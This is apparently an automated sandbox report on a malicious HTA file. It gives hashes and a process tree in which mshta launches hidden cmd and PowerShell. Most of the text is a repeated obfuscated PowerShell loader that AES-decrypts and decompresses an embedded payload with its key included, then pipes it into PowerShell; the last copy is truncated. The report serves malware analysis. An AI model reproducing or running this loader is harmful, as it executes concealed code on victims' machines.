Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Dec. 7, 2022, 9:45 a.m.	Dec. 7, 2022, 9:47 a.m.

Size	127.4KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`b31d78c45268cf98eb09a4ce81ab7f60`
SHA256	`975486fc1cd1be87de661c7503d85d19b81e861c3815b5d8001af936c93e9e01`
CRC32	`98FDFF66`
ssdeep	`3072:1qEwCeMjNK7MPKtX4DKPPDnzjaJez3qjZw3:1djcwPKtIDuPDzLujZw3`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\lib.hta
3048
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju | powershell - }
  1784
  - cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju | powershell -
    296
    - powershell.exe powershell.exe $Ibhr = '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